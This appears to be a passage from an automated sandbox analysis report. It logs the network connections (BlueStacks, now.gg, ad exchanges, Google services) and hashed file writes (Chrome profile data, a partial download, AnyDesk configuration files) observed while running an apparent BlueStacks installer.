GB 108.156.39.62:443 tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev tcp
US 8.8.8.8:53 report1.smartgaga.com udp
US 8.8.8.8:53 147.239.254.3.in-addr.arpa udp
US 8.8.8.8:53 aax-eu.amazon-adsystem.com udp
IE 52.94.222.140:443 aax-eu.amazon-adsystem.com tcp
US 8.8.8.8:53 140.222.94.52.in-addr.arpa udp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 8.8.8.8:53 cloud.bluestacks.com udp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 8.8.8.8:53 bsxplayerv16.bluestacks.com udp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 8.8.8.8:53 x-api.bluestacks.com udp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
GB 79.133.176.222:443 x-api.bluestacks.com tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 8.8.8.8:53 ak-build.bluestacks.com udp
US 8.8.8.8:53 web3-games.now.gg udp
US 8.8.8.8:53 bsxplayerv16.bluestacks.com udp
US 2.20.12.92:443 ak-build.bluestacks.com tcp
GB 18.165.201.53:443 web3-games.now.gg tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
GB 79.133.176.222:443 bsxplayerv16.bluestacks.com tcp
GB 79.133.176.225:443 bsxplayerv16.bluestacks.com tcp
US 8.8.8.8:53 188.98.55.23.in-addr.arpa udp
US 8.8.8.8:53 222.176.133.79.in-addr.arpa udp
US 8.8.8.8:53 53.201.165.18.in-addr.arpa udp
US 8.8.8.8:53 bst-launcher-sgp.bluestacks.cn udp
GB 79.133.176.224:443 bst-launcher-sgp.bluestacks.cn tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 8.8.8.8:53 224.176.133.79.in-addr.arpa udp
US 8.8.8.8:53 wallet.now.gg udp
US 34.96.124.47:443 wallet.now.gg tcp
US 8.8.8.8:53 crypto-blockchain-cdn.now.gg udp
US 8.8.8.8:53 cloud.bluestacks.com udp
US 2.20.12.72:443 crypto-blockchain-cdn.now.gg tcp
US 2.20.12.72:443 crypto-blockchain-cdn.now.gg tcp
US 2.20.12.72:443 crypto-blockchain-cdn.now.gg tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 8.8.8.8:53 now.gg udp
GB 18.244.114.96:443 now.gg tcp
IE 52.94.222.140:443 aax-eu.amazon-adsystem.com tcp
US 2.20.12.72:443 crypto-blockchain-cdn.now.gg tcp
US 2.20.12.72:443 crypto-blockchain-cdn.now.gg tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
GB 18.165.201.53:443 web3-games.now.gg tcp
US 8.8.8.8:53 cdn-icon.bluestacks.com udp
US 2.19.252.134:443 cdn-icon.bluestacks.com tcp
US 2.19.252.134:443 cdn-icon.bluestacks.com tcp
US 2.19.252.134:443 cdn-icon.bluestacks.com tcp
US 8.8.8.8:53 72.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 96.114.244.18.in-addr.arpa udp
US 2.19.252.134:443 cdn-icon.bluestacks.com tcp
US 8.8.8.8:53 s2.coinmarketcap.com udp
GB 18.239.236.114:443 s2.coinmarketcap.com tcp
US 8.8.8.8:53 737586090-files.gitbook.io udp
US 8.8.8.8:53 cdn-bgp.bluestacks.com udp
US 2.19.252.134:443 cdn-icon.bluestacks.com tcp
US 172.64.147.209:443 737586090-files.gitbook.io tcp
US 2.20.12.69:443 cdn-bgp.bluestacks.com tcp
US 2.20.12.69:443 cdn-bgp.bluestacks.com tcp
US 2.20.12.69:443 cdn-bgp.bluestacks.com tcp
US 2.20.12.69:443 cdn-bgp.bluestacks.com tcp
US 2.20.12.69:443 cdn-bgp.bluestacks.com tcp
US 2.20.12.69:443 cdn-bgp.bluestacks.com tcp
US 2.20.12.69:443 cdn-bgp.bluestacks.com tcp
US 2.20.12.69:443 cdn-bgp.bluestacks.com tcp
US 2.20.12.69:443 cdn-bgp.bluestacks.com tcp
US 8.8.8.8:53 114.236.239.18.in-addr.arpa udp
US 8.8.8.8:53 209.147.64.172.in-addr.arpa udp
US 2.20.12.69:443 cdn-bgp.bluestacks.com tcp
US 2.20.12.69:443 cdn-bgp.bluestacks.com tcp
US 2.20.12.69:443 cdn-bgp.bluestacks.com tcp
US 151.101.188.159:443 pbs.twimg.com tcp
US 8.8.8.8:53 1383595251-files.gitbook.io udp
US 8.8.8.8:53 159.188.101.151.in-addr.arpa udp
US 2.20.12.92:443 ak-build.bluestacks.com tcp
US 2.20.12.92:443 ak-build.bluestacks.com tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 8.8.8.8:53 cdn-bgp.bluestacks.com udp
US 2.20.12.81:443 cdn-bgp.bluestacks.com tcp
US 2.20.12.81:443 cdn-bgp.bluestacks.com tcp
US 8.8.8.8:53 81.12.20.2.in-addr.arpa udp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 2.20.12.81:443 cdn-bgp.bluestacks.com tcp
US 2.20.12.81:443 cdn-bgp.bluestacks.com tcp
US 2.20.12.81:443 cdn-bgp.bluestacks.com tcp
US 8.8.8.8:53 cdn.now.gg udp
US 2.20.12.77:443 cdn.now.gg tcp
US 2.20.12.77:443 cdn.now.gg tcp
US 2.20.12.77:443 cdn.now.gg tcp
US 2.20.12.77:443 cdn.now.gg tcp
US 2.20.12.77:443 cdn.now.gg tcp
US 2.20.12.77:443 cdn.now.gg tcp
US 2.20.12.77:443 cdn.now.gg tcp
US 2.20.12.77:443 cdn.now.gg tcp
US 8.8.8.8:53 77.12.20.2.in-addr.arpa udp
US 2.20.12.77:443 cdn.now.gg tcp
US 2.20.12.77:443 cdn.now.gg tcp
US 2.20.12.77:443 cdn.now.gg tcp
US 172.64.151.101:443 htlb.casalemedia.com tcp
US 104.22.54.206:443 i.connectad.io tcp
NL 185.89.210.153:443 ib.adnxs.com tcp
NL 89.149.193.113:443 prg-apac.smartadserver.com tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
DE 3.78.168.176:443 tlx.3lift.com tcp
NL 178.250.1.8:443 bidder.criteo.com tcp
NL 147.75.84.158:443 prebid.a-mo.net tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
IE 52.48.239.33:443 g2.gumgum.com tcp
GB 18.172.154.232:443 aax.amazon-adsystem.com tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
IE 52.48.239.33:443 g2.gumgum.com tcp
GB 18.172.154.232:443 aax.amazon-adsystem.com tcp
NL 89.149.193.113:443 prg-apac.smartadserver.com tcp
US 8.8.8.8:53 app-page-details-prod.bstkinternal.net udp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
IE 52.48.239.33:443 g2.gumgum.com tcp
IE 52.48.239.33:443 g2.gumgum.com tcp
GB 18.172.154.232:443 aax.amazon-adsystem.com tcp
US 34.111.56.14:443 app-page-details-prod.bstkinternal.net tcp
US 34.111.56.14:443 app-page-details-prod.bstkinternal.net tcp
US 8.8.8.8:53 www.youtube.com udp
US 2.20.12.69:443 cdn-bgp.bluestacks.com tcp
GB 142.250.187.206:443 www.youtube.com tcp
US 8.8.8.8:53 cdn-www.bluestacks.com udp
GB 142.250.187.206:443 www.youtube.com tcp
US 2.20.12.91:443 cdn-www.bluestacks.com tcp
US 2.20.12.91:443 cdn-www.bluestacks.com tcp
US 2.20.12.91:443 cdn-www.bluestacks.com tcp
US 2.20.12.91:443 cdn-www.bluestacks.com tcp
US 2.20.12.91:443 cdn-www.bluestacks.com tcp
US 2.20.12.91:443 cdn-www.bluestacks.com tcp
US 8.8.8.8:53 14.56.111.34.in-addr.arpa udp
US 8.8.8.8:53 cdn-icon.bluestacks.com udp
US 2.19.252.135:443 cdn-icon.bluestacks.com tcp
US 2.19.252.135:443 cdn-icon.bluestacks.com tcp
US 8.8.8.8:53 91.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 135.252.19.2.in-addr.arpa udp
US 2.19.252.135:443 cdn-icon.bluestacks.com tcp
US 2.19.252.135:443 cdn-icon.bluestacks.com tcp
US 2.19.252.135:443 cdn-icon.bluestacks.com tcp
US 2.19.252.135:443 cdn-icon.bluestacks.com tcp
US 8.8.8.8:53 cdn.fuseplatform.net udp
BE 23.14.90.90:443 cdn.fuseplatform.net tcp
BE 23.14.90.90:443 cdn.fuseplatform.net tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
IE 52.94.222.140:443 aax-eu.amazon-adsystem.com tcp
IE 52.94.222.140:443 aax-eu.amazon-adsystem.com tcp
US 8.8.8.8:53 report1.smartgaga.com udp
US 8.8.8.8:53 static.doubleclick.net udp
GB 172.217.169.6:443 static.doubleclick.net tcp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
GB 216.58.201.106:443 jnn-pa.googleapis.com tcp
US 8.8.8.8:53 i.ytimg.com udp
GB 142.250.187.196:443 www.google.com tcp
GB 216.58.212.246:443 i.ytimg.com tcp
US 8.8.8.8:53 yt3.ggpht.com udp
GB 142.250.180.1:443 yt3.ggpht.com tcp
US 8.8.8.8:53 6.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 246.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 1.180.250.142.in-addr.arpa udp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 2.20.12.72:443 crypto-blockchain-cdn.now.gg tcp
US 2.20.12.92:443 ak-build.bluestacks.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.187.206:443 www.youtube.com tcp
GB 79.133.176.225:443 bst-launcher-sgp.bluestacks.cn tcp
GB 79.133.176.211:443 bst-launcher-sgp.bluestacks.cn tcp
US 8.8.8.8:53 cdn.now.gg udp
US 2.20.12.88:443 cdn.now.gg tcp
US 2.20.12.88:443 cdn.now.gg tcp
US 2.20.12.88:443 cdn.now.gg tcp
US 2.20.12.88:443 cdn.now.gg tcp
US 8.8.8.8:53 88.12.20.2.in-addr.arpa udp
US 104.22.54.206:443 i.connectad.io tcp
US 8.8.8.8:53 tlx.3lift.com udp
US 8.8.8.8:53 prebid.a-mo.net udp
US 172.64.151.101:443 htlb.casalemedia.com tcp
NL 89.149.193.113:443 prg-apac.smartadserver.com tcp
NL 178.250.1.8:443 bidder.criteo.com tcp
US 8.8.8.8:53 hbopenbid.pubmatic.com udp
US 8.8.8.8:53 ib.adnxs.com udp
US 8.8.8.8:53 aax.amazon-adsystem.com udp
US 8.8.8.8:53 fastlane.rubiconproject.com udp
US 8.8.8.8:53 g2.gumgum.com udp
DE 3.78.168.176:443 tlx.3lift.com tcp
NL 147.75.84.158:443 prebid.a-mo.net tcp
NL 185.89.210.212:443 ib.adnxs.com tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
GB 18.172.154.232:443 aax.amazon-adsystem.com tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
IE 52.48.239.33:443 g2.gumgum.com tcp
US 8.8.8.8:53 212.210.89.185.in-addr.arpa udp
DE 3.78.168.176:443 tlx.3lift.com tcp
US 2.20.12.77:443 cdn.now.gg tcp
NL 89.149.193.113:443 prg-apac.smartadserver.com tcp
NL 178.250.1.8:443 bidder.criteo.com tcp
BE 23.14.90.90:443 cdn.fuseplatform.net tcp
BE 23.14.90.90:443 cdn.fuseplatform.net tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.54.206:443 i.connectad.io tcp
NL 147.75.84.158:443 prebid.a-mo.net tcp
NL 185.89.210.212:443 ib.adnxs.com tcp
US 172.64.151.101:443 htlb.casalemedia.com tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
DE 3.78.168.176:443 tlx.3lift.com tcp
NL 89.149.193.113:443 prg-apac.smartadserver.com tcp
NL 178.250.1.8:443 bidder.criteo.com tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
IE 52.48.239.33:443 g2.gumgum.com tcp
GB 18.172.154.232:443 aax.amazon-adsystem.com tcp
BE 23.14.90.90:443 cdn.fuseplatform.net tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
NL 89.149.193.113:443 prg-apac.smartadserver.com tcp
NL 178.250.1.8:443 bidder.criteo.com tcp
US 104.22.54.206:443 i.connectad.io tcp
DE 3.78.168.176:443 tlx.3lift.com tcp
NL 147.75.84.158:443 prebid.a-mo.net tcp
NL 185.89.210.212:443 ib.adnxs.com tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
US 172.64.151.101:443 htlb.casalemedia.com tcp
IE 52.48.239.33:443 g2.gumgum.com tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
GB 18.172.154.232:443 aax.amazon-adsystem.com tcp
IE 52.48.239.33:443 g2.gumgum.com tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
GB 18.172.154.232:443 aax.amazon-adsystem.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 8.8.8.8:53 cdn.fuseplatform.net udp
BE 23.14.90.90:443 cdn.fuseplatform.net tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
US 8.8.8.8:53 prebid.a-mo.net udp
US 8.8.8.8:53 htlb.casalemedia.com udp
NL 185.89.210.212:443 ib.adnxs.com tcp
US 104.22.54.206:443 i.connectad.io tcp
NL 178.250.1.8:443 bidder.criteo.com tcp
US 8.8.8.8:53 tlx.3lift.com udp
US 8.8.8.8:53 prg-apac.smartadserver.com udp
US 8.8.8.8:53 g2.gumgum.com udp
US 8.8.8.8:53 aax.amazon-adsystem.com udp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
NL 145.40.97.66:443 prebid.a-mo.net tcp
US 104.18.36.155:443 htlb.casalemedia.com tcp
NL 81.17.55.160:443 prg-apac.smartadserver.com tcp
DE 3.78.168.176:443 tlx.3lift.com tcp
IE 52.208.44.24:443 g2.gumgum.com tcp
GB 18.172.154.232:443 aax.amazon-adsystem.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 8.8.8.8:53 160.55.17.81.in-addr.arpa udp
US 104.22.0.235:443 api.reasonsecurity.com tcp
NL 81.17.55.160:443 prg-apac.smartadserver.com tcp
BE 23.14.90.90:443 cdn.fuseplatform.net tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 8.8.8.8:53 storage.googleapis.com udp
GB 172.217.16.251:443 storage.googleapis.com tcp
US 8.8.8.8:53 251.16.217.172.in-addr.arpa udp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
NL 185.89.210.212:443 ib.adnxs.com tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
US 104.18.36.155:443 htlb.casalemedia.com tcp
NL 178.250.1.8:443 bidder.criteo.com tcp
US 104.22.54.206:443 i.connectad.io tcp
NL 81.17.55.160:443 prg-apac.smartadserver.com tcp
NL 145.40.97.66:443 prebid.a-mo.net tcp
DE 3.78.168.176:443 tlx.3lift.com tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
IE 52.208.44.24:443 g2.gumgum.com tcp
GB 18.172.154.232:443 aax.amazon-adsystem.com tcp
BE 23.14.90.90:443 cdn.fuseplatform.net tcp
US 8.8.8.8:53 aax-eu.amazon-adsystem.com udp
IE 67.220.226.232:443 aax-eu.amazon-adsystem.com tcp
IE 67.220.226.232:443 aax-eu.amazon-adsystem.com tcp
US 8.8.8.8:53 m.media-amazon.com udp
US 8.8.8.8:53 aan.amazon.co.uk udp
GB 18.154.87.195:443 m.media-amazon.com tcp
IE 3.254.237.44:443 aan.amazon.co.uk tcp
IE 3.254.237.44:443 aan.amazon.co.uk tcp
IE 3.254.237.44:443 aan.amazon.co.uk tcp
GB 18.245.218.37:443 ts.amazon-adsystem.com tcp
US 8.8.8.8:53 s2.paa-reporting-advertising.amazon udp
GB 54.192.137.6:443 s2.paa-reporting-advertising.amazon tcp
US 8.8.8.8:53 sq-tungsten-ts-eu.amazon-adsystem.com udp
US 8.8.8.8:53 tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev udp
IE 3.253.169.168:443 sq-tungsten-ts-eu.amazon-adsystem.com tcp
GB 108.156.39.97:443 tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev tcp
US 8.8.8.8:53 44.237.254.3.in-addr.arpa udp
US 8.8.8.8:53 168.169.253.3.in-addr.arpa udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
NL 185.89.210.212:443 ib.adnxs.com tcp
NL 178.250.1.8:443 bidder.criteo.com tcp
NL 81.17.55.160:443 prg-apac.smartadserver.com tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
IE 3.254.237.44:443 aan.amazon.co.uk tcp
IE 3.253.169.168:443 sq-tungsten-ts-eu.amazon-adsystem.com tcp
US 8.8.8.8:53 tpc.googlesyndication.com udp
NL 178.250.1.8:443 bidder.criteo.com tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
NL 185.89.210.212:443 ib.adnxs.com tcp
US 8.8.8.8:53 prg-apac.smartadserver.com udp
NL 81.17.55.112:443 prg-apac.smartadserver.com tcp
US 8.8.8.8:53 112.55.17.81.in-addr.arpa udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 8.8.8.8:53 226.187.250.142.in-addr.arpa udp
NL 185.89.210.212:443 ib.adnxs.com tcp
NL 178.250.1.8:443 bidder.criteo.com tcp
NL 81.17.55.112:443 prg-apac.smartadserver.com tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
US 8.8.8.8:53 aax-eu.amazon-adsystem.com udp
US 8.8.8.8:53 aan.amazon.co.uk udp
IE 3.254.238.154:443 aan.amazon.co.uk tcp
US 8.8.8.8:53 s2.paa-reporting-advertising.amazon udp
US 8.8.8.8:53 sq-tungsten-ts-eu.amazon-adsystem.com udp
IE 3.254.239.147:443 sq-tungsten-ts-eu.amazon-adsystem.com tcp
US 8.8.8.8:53 154.238.254.3.in-addr.arpa udp
NL 178.250.1.8:443 bidder.criteo.com tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
NL 81.17.55.112:443 prg-apac.smartadserver.com tcp
NL 185.89.210.212:443 ib.adnxs.com tcp
IE 3.254.239.147:443 sq-tungsten-ts-eu.amazon-adsystem.com tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 fastlane.rubiconproject.com udp
NL 185.89.210.212:443 ib.adnxs.com tcp
US 8.8.8.8:53 prg-apac.smartadserver.com udp
NL 178.250.1.8:443 bidder.criteo.com tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
NL 81.17.55.161:443 prg-apac.smartadserver.com tcp
US 8.8.8.8:53 161.55.17.81.in-addr.arpa udp
IE 3.254.239.147:443 sq-tungsten-ts-eu.amazon-adsystem.com tcp

Files

\??\pipe\crashpad_3832_XFWDEKGDGVPETDXB

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 16d57d2276378dad0021f08d62aade68
SHA1 d5328293391f35a595a35a5dd3aeea97aa55b9e2
SHA256 07680f886c5b93b391f67d6d22dcf14bde627ed09dc56c6ccfefb720d1eb68b7
SHA512 7d63a486cfb92587d2334d09e506151053c9be91074520bf202889180bcc9ae8050e4b5a6b0d91716d38178732de2bef43b20d5a5b679344cdf805fffb49490f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 0e6d8c06765affc010b1fa2f685f4445
SHA1 bd0ad9b4e98c885fcda2f7ef08db9904abb9a815
SHA256 edb3448698a68000f1d4eafe56c70073830b0f7dc91a320772fbd8096b84b703
SHA512 a8fe1414b744930fa62d4a1d023744c5402695a7f231de3c9d245737553c16b53a1a609d1b42b3adeec7e329684484798d14ae297b4487c054bd20131e7e0060

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000038

MD5 151fb811968eaf8efb840908b89dc9d4
SHA1 7ec811009fd9b0e6d92d12d78b002275f2f1bee1
SHA256 043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed
SHA512 83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 a679a07140154e2c4ceac9da4d7ac929
SHA1 8921b729787ecc85871b06e69ea6da7d56dbc9c4
SHA256 db73956e22a8a377e2a9ee45de7aee8ded11f519e8421f34aff69b69683246b6
SHA512 4878e5fc07750db6668246d2725b76b66c348f648a98042567e0510cb53a6df654e084f94254e9304ffe71b21f15b62fe46edd2cc9ab57e48907a31bce4baa7c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 b5eeb0b998b9115f3afb1a6ce95de5d1
SHA1 8b5fd817fc9bc7c7896c54d4ae9ac0c18f6fdf5e
SHA256 2cbdb23a81b6b93c5b2c7e860cde5266380b77a66e6b5e78dabb34783c9837bb
SHA512 8b26cd980de5ff8d6fa8a7ac213f71f862d40622bd608e8d1fb52b4fe86169051bec177c52c8a1015b40b7779e99c6717f3adb90b791f33bcb581b1d8794cff0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000037

MD5 c594a826934b9505d591d0f7a7df80b7
SHA1 c04b8637e686f71f3fc46a29a86346ba9b04ae18
SHA256 e664eef3d68ac6336a28be033165d4780e8a5ab28f0d90df1b148ef86babb610
SHA512 04a1dfdb8ee2f5fefa101d5e3ff36e87659fd774e96aa8c5941d3353ccc268a125822cf01533c74839e5f1c54725da9cc437d3d69b88e5bf3f99caccd4d75961

C:\Users\Admin\Downloads\Unconfirmed 93147.crdownload

MD5 aee6801792d67607f228be8cec8291f9
SHA1 bf6ba727ff14ca2fddf619f292d56db9d9088066
SHA256 1cdafbe519f60aaadb4a92e266fff709129f86f0c9ee595c45499c66092e0499
SHA512 09d9fc8702ab6fa4fc9323c37bc970b8a7dd180293b0dbf337de726476b0b9515a4f383fa294ba084eccf0698d1e3cb5a39d0ff9ea3ba40c8a56acafce3add4f

memory/5236-387-0x0000000000734000-0x000000000196A000-memory.dmp

memory/5236-385-0x0000000000730000-0x0000000001E79000-memory.dmp

memory/5236-389-0x0000000000730000-0x0000000001E79000-memory.dmp

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 7b11e36cff6579322786ba7b0e3cb3be
SHA1 c8732766122728a400185d0203ac53f8756c296b
SHA256 0d1f9453ca31ce8bc977a132ffaee11ef6dce2dab7f733056ae0c732894a39a6
SHA512 a0669ce64cdfe2391700ce33d2a832720b602b5fab89f005b092c70ed7bb1e8705c4bcf3f5d3421a8244efd25c2c92d5cbde897df84c011266ee4763754cdf86

memory/5420-404-0x0000000000730000-0x0000000001E79000-memory.dmp

C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

MD5 04d7a5d2cfb3f366cfcd774a9bba8f4f
SHA1 9d868fee8b02f35946da9941ce7f4272556c01de
SHA256 5532ab0a1f5a0f3296e636e6a2c15b55ce249dcbe9a93084fcabd921b7b50f45
SHA512 afc42cf028ee83f4cb37c5c5a906a79c18d3184568b5608fcab000898e749f65413417a9cd71f965e323f9c508c2d3da9c86f921233b414c202232a19702e14e

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 b347bb8a86f56cf51c43747649203b40
SHA1 1b5f45f5e3bc063d1dee2abddb80026678596300
SHA256 f49f39b98d8d5a1549737804276411bd8c16df9ee8d3539dfc2c46c74da07af6
SHA512 c1c1ca408d191fcbaaad89bba9d094c0e021416ccc16ecd03c3fdf9d0eaded28c3ddf96cf33e0c47a699438b6f46d256e70c2ebaeb57954baa817684d67243a3

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 0c04ad1083dc5c7c45e3ee2cd344ae38
